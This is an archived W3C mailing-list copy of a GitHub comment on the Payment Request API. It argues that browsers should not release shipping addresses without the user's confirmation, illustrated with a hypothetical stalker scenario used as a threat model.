Re: [w3c/browser-payment-api] What if the user refuses to supply a shipping address (#279) from Jeff Burdges on 2016-09-20 (public-webpayments-specs@w3.org from September 2016)

From: Jeff Burdges <notifications@github.com>
Date: Tue, 20 Sep 2016 15:05:50 -0700
To: w3c/browser-payment-api <browser-payment-api@noreply.github.com>
Message-ID: <w3c/browser-payment-api/issues/279/248449300@github.com>

I'm envisioning attacks like the following :

Some browser has a scenario where it supplies the shipping address without prompting the user, like maybe the user has only ever entered one shipping address or whatever.

We've an adversary Steve the Stalker who likes to collect celebrities' home addresses so he can go visit them. Steve sets up an online gossip magazine that requires buying a $0.05 subscription for most content. Steve selects the payment app to look innocuous, appear not need an address due to it being digital delivery, etc., but nevertheless sets that address is required. I doubt Steve even needs to process any payments or posses a merchant account, so he remains anonymous.

Clever twitter usage, etc. brings in the victims. Almost nobody bulks at paying $0.05 with a payment app that normally looks pretty secure, due to using some tokenizations or whatever. Certainly some notice that an address is required, either because their browser asks for a first shipping address, or because it asks for them to pick one, or because they use a better browser. But plenty fall into the scenario where no shipping address prompt occurs.

This is a completely realistic attack. There were some Russians who doxed a bunch of Russian porn stars recently. And most celebrities google themselves to see what is being said about them.

I think we really need a firm principle that no personal information is ever supplied without the user being reminded of that information and approving it. Yes, I know ordinary form auto-complete already violates that principle, but some people do turn it off for that reason, and that's not a reason to make this spec insecure. Yes, I know the attack still works if people get the habit of clicking Ok too quickly, but that's still a big reduction.

--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3c/browser-payment-api/issues/279#issuecomment-248449300

Received on Tuesday, 20 September 2016 22:06:23 UTC